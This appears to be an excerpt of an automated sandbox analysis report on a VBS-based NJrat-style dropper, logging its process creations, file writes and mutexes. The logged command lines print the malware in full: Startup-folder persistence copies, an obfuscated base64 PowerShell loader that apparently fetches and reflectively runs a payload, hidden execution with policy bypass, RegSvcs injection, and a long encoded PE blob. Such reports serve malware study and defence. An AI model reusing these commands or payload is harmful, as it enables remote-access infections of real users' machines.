U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220221 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czz05exg.e0h.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@26/15@10/5
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\4c6c9a1bbdc34e6ebe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_01
